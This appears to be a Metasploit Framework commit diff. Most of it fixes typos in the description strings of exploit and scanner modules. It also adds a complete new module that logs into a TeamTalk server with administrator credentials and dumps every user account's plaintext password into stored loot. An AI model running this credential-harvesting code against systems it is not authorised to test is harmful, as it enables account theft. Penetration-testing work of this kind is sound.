@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name' => 'Shodan Search',
       'Description' => %q{
         This module uses the Shodan API to search Shodan. Accounts are free
-        and an API key is required to used this module. Output from the module
+        and an API key is required to use this module. Output from the module
         is displayed to the screen and can be saved to a file or the MSF database.
         NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in
         queries, but there are limitations when used with a free API key. Please

modules/auxiliary/gather/teamtalk_creds.rb

@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'TeamTalk Gather Credentials',
+      'Description' => %q{
+        This module retrieves user credentials from BearWare TeamTalk.
+
+        Valid administrator credentials are required.
+
+        This module has been tested successfully on TeamTalk versions
+        5.2.2.4885 and 5.2.3.4893.
+      },
+      'Author'      => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'  =>
+        [
+          # Protocol documentation
+          ['URL', 'https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php']
+        ],
+      'License'     => MSF_LICENSE))
+    register_options [
+      Opt::RPORT(10333),
+      OptString.new('USERNAME', [false, 'The username for TeamTalk', 'admin']),
+      OptString.new('PASSWORD', [false, 'The password for the specified username', 'admin'])
+    ]
+  end
+
+  def run
+    vprint_status 'Connecting...'
+
+    connect
+    banner = sock.get_once
+
+    unless banner =~ /^teamtalk\s.*protocol="([\d\.]+)"/
+      fail_with Failure::BadConfig, 'TeamTalk does not appear to be running'
+    end
+
+    print_status "Found TeamTalk (protocol version #{$1})"
+
+    report_service :host  => rhost,
+                   :port  => rport,
+                   :proto => 'tcp',
+                   :name  => 'teamtalk'
+
+    vprint_status "Authenticating as '#{username}'"
+
+    req = "login username=\"#{username.tr('"', '\"')}\" password=\"#{password.tr('"', '\"')}\""
+    res = send_command req
+
+    unless res.to_s.starts_with? 'accepted'
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good 'Authenticated successfully'
+
+    if res =~ /usertype=2/
+      print_good 'User is an administrator'
+    else
+      print_warning 'User is not an administrator'
+    end
+
+    vprint_status "Retrieving users..."
+
+    res = send_command 'listaccounts'
+
+    if res =~ /^error/ && res =~ /message="Command not authorized"/
+      print_error 'Insufficient privileges'
+      return
+    end
+
+    unless res =~ /^ok\r?\n?\z/
+      print_error 'Unexpected reply'
+      return
+    end
+
+    cred_table = Rex::Text::Table.new 'Header'  => 'TeamTalk User Credentials',
+                                      'Indent'  => 1,
+                                      'Columns' => ['Username', 'Password', 'Type']
+
+    res.each_line do |line|
+      line.chomp!
+      next unless line =~ /^useraccount/
+
+      user = line.scan(/\s+username="(.*?)"\s+password=/).flatten.first.to_s.gsub('\"', '"')
+      pass = line.scan(/\s+password="(.*?)"\s+usertype=/).flatten.first.to_s.gsub('\"', '"')
+      type = line.scan(/\s+usertype=(\d+)\s+/).flatten.first
+
+      cred_table << [ user, pass, type ]
+      report_cred user:     user,
+                  password: pass,
+                  type:     type,
+                  proof:    line
+    end
+
+    if cred_table.rows.empty?
+      print_error 'Did not find any users'
+      return
+    end
+
+    print_status "Found #{cred_table.rows.size} users"
+    print_line
+    print_line cred_table.to_s
+
+    p = store_loot 'teamtalk.user.creds',
+                   'text/csv',
+                   rhost,
+                   cred_table.to_csv,
+                   'TeamTalk User Credentials'
+
+    print_good "Credentials saved in: #{p}"
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    print_error e.message
+  ensure
+    disconnect
+  end
+
+  private
+
+  def username
+    datastore['USERNAME'] || ''
+  end
+
+  def password
+    datastore['PASSWORD'] || ''
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address:      rhost,
+      port:         rport,
+      service_name: 'teamtalk',
+      protocol:     'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type:     :service,
+      module_fullname: fullname,
+      username:        opts[:user],
+      private_data:    opts[:password],
+      private_type:    :password
+    }.merge service_data
+
+    login_data = {
+      core:              create_credential(credential_data),
+      status:            Metasploit::Model::Login::Status::UNTRIED,
+      access_level:      opts[:type],
+      proof:             opts[:proof]
+    }.merge service_data
+
+    create_credential_login login_data
+  end
+
+  def send_command(cmd = '')
+    cmd_id = rand(1000)
+    sock.put "#{cmd} id=#{cmd_id}\n"
+
+    res = ''
+    timeout = 15
+    Timeout.timeout(timeout) do
+      res << sock.get_once until res =~ /^end id=#{cmd_id}/
+    end
+
+    res.to_s.scan(/begin id=#{cmd_id}\r?\n(.*)\r?\nend id=#{cmd_id}/m).flatten.first
+  rescue Timeout::Error
+    print_error "Timeout (#{timeout} seconds)"
+  rescue => e
+    print_error e.message
+  end
+end

modules/auxiliary/gather/windows_deployment_services_shares.rb

@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
           This module will search remote file shares for unattended installation files that may contain
           domain credentials. This is often used after discovering domain credentials with the
-          auxilliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
+          auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
           have domain credentials. This module will connect to the RemInst share and any Microsoft
           Deployment Toolkit shares indicated by the share name comments.
       },

modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb

@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary
       'Name'          => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract',
       'Description'   =>
         "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
-        and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards
+        and its results in files for fast access. Version 0.9.2.4 has been fixed afterwards
         so it can be vulnerable. These cache files are in the webroot of the Wordpress
-        installation and can be downloaded if the name is guessed. This modules tries to
+        installation and can be downloaded if the name is guessed. This module tries to
         locate them with brute force in order to find usernames and password hashes in these
         files. W3 Total Cache must be configured with Database Cache enabled and Database
         Cache Method set to Disk to be vulnerable",

modules/auxiliary/pdf/foxit/authbypass.rb

@@ -12,9 +12,9 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Foxit Reader Authorization Bypass',
       'Description'    => %q{
-          This module exploits a authorization bypass vulnerability in Foxit Reader
-        build 1120. When a attacker creates a specially crafted pdf file containing
-        a Open/Execute action, arbitrary commands can be executed without confirmation
+          This module exploits an authorization bypass vulnerability in Foxit Reader
+        build 1120. When an attacker creates a specially crafted pdf file containing
+        an Open/Execute action, arbitrary commands can be executed without confirmation
         from the victim.
       },
       'License'        => MSF_LICENSE,

modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
     'Description' => %q{
         Send a spoofed router advertisement with high priority to force hosts to
         start the IPv6 address auto-config. Monitor for IPv6 host advertisements,
-        and try to guess the link-local address by concatinating the prefix, and
+        and try to guess the link-local address by concatenating the prefix, and
         the host portion of the IPv6 address.  Use NDP host solicitation to
         determine if the IP address is valid'
     },

modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q(
         This module implements the DLSw information disclosure retrieval. There
         is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
-        that allows an unuthenticated remote attacker to retrieve the partial
+        that allows an unauthenticated remote attacker to retrieve the partial
         contents of packets traversing a Cisco router with DLSw configured
         and active.
       ),

modules/auxiliary/scanner/dns/dns_amp.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'DNS Amplification Scanner',
       'Description' => %q{
           This module can be used to discover DNS servers which expose recursive
-          name lookups which can be used in an amplication attack against a
+          name lookups which can be used in an amplification attack against a
           third party.
       },
       'Author'      => [ 'xistence <xistence[at]0x90.nl>'], # Original scanner module

modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
         This module exploits a directory traversal vulnerability found in ColoradoFTP server
         version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files
         from the server GET/PUT command including file system traversal strings starting with '\\\'.
-        The server is writen in Java and therefore platform independant, however this vulnerability is only
+        The server is written in Java and therefore platform independent, however this vulnerability is only
         exploitable on the Windows version.
       },
       'Platform'       => 'win',

modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'           => 'Titan FTP XCRC Directory Traversal Information Disclosure',
       'Description'    => %q{
-          This module exploits a directory traversal vulnreability in the XCRC command
+          This module exploits a directory traversal vulnerability in the XCRC command
         implemented in versions of Titan FTP up to and including 8.10.1125. By making
         sending multiple XCRC command, it is possible to disclose the contents of any
         file on the drive with a simple CRC "brute force" attack.

modules/auxiliary/scanner/http/adobe_xml_inject.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'        => 'Adobe XML External Entity Injection',
       'Description' => %q{
-          Multiple Adobe Products -- XML External Entity Injection. Affected Sofware: BlazeDS 3.2 and
+          Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and
         earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and
         2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2
       },

modules/auxiliary/scanner/http/barracuda_directory_traversal.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Barracuda Multiple Product "locale" Directory Traversal',
       'Description'    => %q{
           This module exploits a directory traversal vulnerability present in
-        serveral Barracuda products, including the Barracuda Spam and Virus Firewall,
+        several Barracuda products, including the Barracuda Spam and Virus Firewall,
         Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,
         this module will attempt to download the Barracuda configuration file.
       },

modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Bitweaver overlay_type Directory Traversal',
       'Description'    => %q{
           This module exploits a directory traversal vulnerability found in Bitweaver.
-        When hanlding the 'overlay_type' parameter, view_overlay.php fails to do any
+        When handling the 'overlay_type' parameter, view_overlay.php fails to do any
         path checking/filtering, which can be abused to read any file outside the
         virtual directory.
       },

modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb

@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
           This module attempts to authenticate to different D-Link HTTP management
         services. It has been tested successfully on D-Link DIR-300 Hardware revision B,
         D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645
-        Hardware revision A devices.It is possible that this module also works with	other
+        Hardware revision A devices. It is possible that this module also works with other
         models.
       },
       'Author'         =>

modules/auxiliary/scanner/http/error_sql_injection.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'   		=> 'HTTP Error Based SQL Injection Scanner',
       'Description'	=> %q{
-        This module identifies the existence of Error Based SQL injection issues. Still requires alot of work
+        This module identifies the existence of Error Based SQL injection issues. Still requires a lot of work
 
       },
       'Author' 		=> [ 'et [at] cyberspace.org' ],

modules/auxiliary/scanner/http/file_same_name_dir.rb

@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
         in a given directory path named as the same name of the
         directory.
 
-        Only works if PATH is differenet than '/'.
+        Only works if PATH is different than '/'.
       },
       'Author' 		=> [ 'et [at] metasploit.com' ],
       'License'		=> BSD_LICENSE))

modules/auxiliary/scanner/http/iis_internal_ip.rb

@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'Microsoft IIS HTTP Internal IP Disclosure',
       'Description' => %q{
-        Collect any leaked internal IPs by requesting commonly redirected locs from IIS.
+        Collect any leaked internal IPs by requesting commonly redirected locations from IIS.
       },
       'Author'       => ['Heather Pilkington'],
       'License'     => MSF_LICENSE

modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %q{
         This module scans for Intel Active Management Technology endpoints and attempts
         to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service
-        can be found on ports 16992, 16993 (tls), 623, and 624(tls).
+        can be found on ports 16992, 16993 (tls), 623, and 624 (tls).
       },
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE,

modules/auxiliary/scanner/http/jboss_vulnscan.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'                  => 'JBoss Vulnerability Scanner',
       'Description'           => %q(
-        This module scans a JBoss instance for a few vulnerablities.
+        This module scans a JBoss instance for a few vulnerabilities.
       ),
       'Author'                =>
         [

modules/auxiliary/scanner/http/jenkins_enum.rb

@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Jenkins-CI Enumeration',
       'Description' => %q{
         This module enumerates a remote Jenkins-CI installation in an unauthenticated manner, including
-        host operating system and and Jenkins installation details.
+        host operating system and Jenkins installation details.
       },
       'Author'      => 'Jeff McCutchan',
       'License'     => MSF_LICENSE

modules/auxiliary/scanner/http/lucky_punch.rb

@@ -16,8 +16,8 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'HTTP Microsoft SQL Injection Table XSS Infection',
       'Description'    => %q{
         This module implements the mass SQL injection attack in
-        use lately by concatenation of HTML string that forces a persistant
-        XSS attack to redirect user browser to a attacker controller website.
+        use lately by concatenation of HTML string that forces a persistent
+        XSS attack to redirect user browser to an attacker controller website.
       },
       'Author'         => [ 'et' ],
       'License'        => BSD_LICENSE))

modules/auxiliary/scanner/http/ntlm_info_enumeration.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
           This module makes requests to resources on the target server in
         an attempt to find resources which permit NTLM authentication. For
         resources which permit NTLM authentication, a blank NTLM type 1 message
-        is sent to enumerate a a type 2 message from the target server. The type
+        is sent to enumerate a type 2 message from the target server. The type
         2 message is then parsed for information such as the Active Directory
         domain and NetBIOS name.  A single URI can be specified with TARGET_URI
         and/or a file of URIs can be specified with TARGET_URIS_FILE (default).

modules/auxiliary/scanner/http/octopusdeploy_login.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'           => 'Octopus Deploy Login Utility',
       'Description'    => %q{
-        This module simply attempts to login to a Octopus Deploy server using a specific
+        This module simply attempts to login to an Octopus Deploy server using a specific
         username and password. It has been confirmed to work on version 3.4.4
       },
       'Author'         => [ 'James Otten <jamesotten1[at]gmail.com>' ],

modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
         This module exploits a file download vulnerability found in Oracle
         Demantra 12.2.1 in combination with an authentication bypass. By
-        combining these exposures, an unauthenticated user can retreive any file
+        combining these exposures, an unauthenticated user can retrieve any file
         on the system by referencing the full file path to any file a vulnerable
         machine.
       },

modules/auxiliary/scanner/http/rails_mass_assignment.rb

@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
         models with attributes not protected by attr_protected or attr_accessible.
         After attempting to assign a non-existent field, the default rails with
         active_record setup will raise an ActiveRecord::UnknownAttributeError
-        exeption, and reply with HTTP code 500.
+        exception, and reply with HTTP code 500.
       },
 
       'References'     =>

modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'		   => 'SAP BusinessObjects User Enumeration',
       'Description'	=> %Q{
         This module simply attempts to enumerate SAP BusinessObjects
-        users.The dswsbobje interface is only used to verify valid
+        users. The dswsbobje interface is only used to verify valid
         users for CmcApp. Therefore, any valid users that have been
         identified can be leveraged by logging into CmcApp.
         },

modules/auxiliary/scanner/http/scraper.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'HTTP Page Scraper',
-      'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
+      'Description' => 'Scrape defined data from a specific web page based on a regular expression',
       'Author'      => ['et'],
       'License'     => MSF_LICENSE
     )

modules/auxiliary/scanner/http/squid_pivot_scanning.rb

@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
         A misconfigured Squid proxy can allow an attacker to make requests on his behalf.
           This may give the attacker information about devices that he cannot reach but the
           Squid proxy can. For example, an attacker can make requests for internal IP addresses
-          against a misconfigurated open Squid proxy exposed to the Internet, therefore performing
+          against a misconfigured open Squid proxy exposed to the Internet, therefore performing
           an internal port scan. The error messages returned by the proxy are used to determine
           if the port is open or not.
 

modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb

@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Squiz Matrix User Enumeration Scanner',
       'Description'    => %q{
-        This module attempts to enumernate remote users that exist within
+        This module attempts to enumerate remote users that exist within
         the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs
         e.g. ?a=14 and searching for a valid username eg "~root" or "~test" which
         is prefixed by a "~" in the response. It will also try to GET the users

modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability',
       'Description'    => %q{
-        This module will  grab the AD account saved in Symantec Messaging Gateway and then
+        This module will grab the AD account saved in Symantec Messaging Gateway and then
         decipher it using the disclosed Symantec PBE key.  Note that authentication is required
         in order to successfully grab the LDAP credentials, and you need at least a read account.
         Version 10.6.0-7 and earlier are affected

modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
         task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
         Console and can be triggered by sending a specially crafted request to the rtrlet component,
         allowing a remote unauthenticated user to retrieve the configuration parameters of
-        Nozvell Zenworks Asset Managmment, including the database credentials in clear text.
+        Novell Zenworks Asset Managment, including the database credentials in clear text.
         This module has been successfully tested on Novell ZENworks Asset Management 7.5.
       },
       'License'        => MSF_LICENSE,

modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
         executable in order to retrieve passwords, allowing remote attackers to take
         administrative control over the device.  Other similar IP Cameras such as Edimax,
         Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
-        The protocol deisgn issue also allows attackers to reset passwords on the device.
+        The protocol design issue also allows attackers to reset passwords on the device.
       },
       'Author'      => 'Ben Schmidt',
       'License'     => MSF_LICENSE

modules/auxiliary/scanner/mssql/mssql_schemadump.rb

@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %Q{
           This module attempts to extract the schema from a MSSQL Server
           Instance. It will disregard builtin and example DBs such
-          as master,model,msdb, and tempdb. The  module will create
+          as master, model, msdb, and tempdb. The module will create
           a note for each DB found, and store a YAML formatted output
           as loot for easy reading.
       },

modules/auxiliary/scanner/openvas/openvas_gsad_login.rb

@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'           => 'OpenVAS gsad Web Interface Login Utility',
       'Description'    => %q{
-        This module simply attempts to login to a OpenVAS gsad interface
+        This module simply attempts to login to an OpenVAS gsad interface
         using a specific user/pass.
       },
       'Author'         => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],

modules/auxiliary/scanner/oracle/emc_sid.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'        => 'Oracle Enterprise Manager Control SID Discovery',
       'Description' => %q{
-          This module makes a request to the Oracle  Enterprise Manager Control Console
+          This module makes a request to the Oracle Enterprise Manager Control Console
         in an attempt to discover the SID.
       },
       'References'  =>

modules/auxiliary/scanner/oracle/sid_brute.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle TNS Listener SID Bruteforce',
       'Description'    => %q{
-        This module queries the TNS listner for a valid Oracle database
+        This module queries the TNS listener for a valid Oracle database
         instance name (also known as a SID).
         Any response other than a "reject" will be considered a success.
         If a specific SID is provided, that SID will be attempted. Otherwise,

modules/auxiliary/scanner/oracle/sid_enum.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle TNS Listener SID Enumeration',
       'Description'    => %q{
-        This module simply queries the TNS listner for the Oracle SID.
+        This module simply queries the TNS listener for the Oracle SID.
         With Oracle 9.2.0.8 and above the listener will be protected and
         the SID will have to be bruteforced or guessed.
       },

modules/auxiliary/scanner/oracle/tnspoison_checker.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
         This module checks the server for vulnerabilities like TNS Poison.
         Module sends a server a packet with command to register new TNS Listener and checks
         for a response indicating an error. If the registration is errored, the target is not
-        vulnearble. Otherwise, the target is vulnerable to malicious registrations.
+        vulnerable. Otherwise, the target is vulnerable to malicious registrations.
       },
       'Author'         => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]
       'References'     =>

modules/auxiliary/scanner/oracle/xdb_sid.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'        => 'Oracle XML DB SID Discovery',
       'Description' => %q{
-          This module simply makes a authenticated request to retrieve
+          This module simply makes an authenticated request to retrieve
           the sid from the Oracle XML DB httpd server.
       },
       'References'  =>

modules/auxiliary/scanner/postgres/postgres_version.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'PostgreSQL Version Probe',
       'Description'    => %q{
-        Enumerates the verion of PostgreSQL servers.
+        Enumerates the version of PostgreSQL servers.
       },
       'Author'         => [ 'todb' ],
       'License'        => MSF_LICENSE,

modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb

@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name'         => 'SAP Management Console getStartProfile',
       'Description'  => %q{
-        This module simply attempts to acces the SAP startup profile
+        This module simply attempts to access the SAP startup profile
         through the SAP Management Console SOAP Interface.
         },
       'References'   =>

modules/auxiliary/scanner/scada/modbus_findunitid.rb

@@ -13,10 +13,10 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
         Modbus is a cleartext protocol used in common SCADA systems, developed
         originally as a serial-line (RS232) async protocol, and later transformed
-        to IP, which is called ModbusTCP. default tcpport is 502.
+        to IP, which is called ModbusTCP. default tcp port is 502.
 
         This module sends a command (0x04, read input register) to the modbus endpoint.
-        If this command is sent to the correct unit-id, it returns with the same funcion-id.
+        If this command is sent to the correct unit-id, it returns with the same function-id.
         if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows
         which do not interest us. This does not always happen, but at least the first 4
         bytes in the return-packet should be exact the same as what was sent.

modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'HP LaserJet Printer SNMP Enumeration',
       'Description' => %q{
         This module allows enumeration of files previously printed.
-        It provides details as filename, client, timestamp and username informations.
+        It provides details as filename, client, timestamp and username information.
         The default community used is "public".
       },
       'References'  =>

modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %Q{
         This module uses supplied login credentials to connect to VMWare via
         the web interface. It then searches through the datastores looking for screenshots.
-        It will downlaod any screenshots it finds and save them as loot.
+        It will download any screenshots it finds and save them as loot.
       },
       'Author'         => ['theLightCosine'],
       'License'        => MSF_LICENSE

modules/auxiliary/server/browser_autopwn2.rb

@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
         if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.
 
         The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash
-        exploits, you can set this. Also note that the Exclude option will always be evaludated
+        exploits, you can set this. Also note that the Exclude option will always be evaluated
         after the Include option.
 
         The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.

modules/auxiliary/server/icmp_exfil.rb

@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
 
         To use this module you will need to send an initial ICMP echo request containing the
         specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or
-        a random filename can be assisnged). All data received from this source will automatically
+        a random filename can be assigned). All data received from this source will automatically
         be added to the receive buffer until an ICMP echo request containing a specific end trigger
         (defaults to '^EOL') is received.
 

modules/auxiliary/spoof/dns/compare_results.rb

@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
         This module can be used to determine differences
       in the cache entries between two DNS servers. This is
       primarily useful for detecting cache poisoning attacks,
-      but can also be used to detect geo-location loadbalancing.
+      but can also be used to detect geo-location load balancing.
       },
       'Author'         => [ 'hdm' ],
       'License'        => MSF_LICENSE,

modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION',
       'Description'    => %q{
-        This module will escalate a Oracle DB user to DBA by exploiting an sql injection
+        This module will escalate an Oracle DB user to DBA by exploiting a sql injection
         bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function.
         This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and
         10g up to 10.1.0.4.

modules/auxiliary/sqli/oracle/dbms_export_extension.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION',
       'Description'    => %q{
-        This module will escalate a Oracle DB user to DBA by exploiting an
+        This module will escalate an Oracle DB user to DBA by exploiting a
         sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package.
 
         Note: This module has been tested against 9i, 10gR1 and 10gR2.

modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML',
       'Description'    => %q{
-        This module will escalate a Oracle DB user to DBA by exploiting an sql injection
+        This module will escalate an Oracle DB user to DBA by exploiting a sql injection
         bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.
       },
       'Author'         => [ 'MC' ],

modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML',
       'Description'    => %q{
-        This module will escalate a Oracle DB user to DBA by exploiting an sql injection
+        This module will escalate an Oracle DB user to DBA by exploiting a sql injection
         bug in the SYS.DBMS_METADATA.GET_XML package/function.
       },
       'Author'         => [ 'MC' ],

modules/auxiliary/sqli/oracle/droptable_trigger.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger',
       'Description'    => %q{
-          This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in
+          This module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in
           the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege
           given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
       },

modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb

@@ -10,8 +10,8 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method',
       'Description'    => %q{
-          This module will escalate a Oracle DB user to DBA by exploiting
-          an sql injection bug in the SYS.LT.FINDRICSET package via Evil
+          This module will escalate an Oracle DB user to DBA by exploiting
+          a sql injection bug in the SYS.LT.FINDRICSET package via Evil
           Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on
           thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical
           Patch update October 2007.

modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE',
       'Description'    => %q{
-        This module exploits an sql injection flaw in the MERGEWORKSPACE
+        This module exploits a sql injection flaw in the MERGEWORKSPACE
         procedure of the PL/SQL package SYS.LT. Any user with execute
         privilege on the vulnerable package can exploit this vulnerability.
       },

modules/auxiliary/sqli/oracle/lt_removeworkspace.rb

@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE',
       'Description'    => %q{
-        This module exploits an sql injection flaw in the REMOVEWORKSPACE
+        This module exploits a sql injection flaw in the REMOVEWORKSPACE
         procedure of the PL/SQL package SYS.LT. Any user with execute
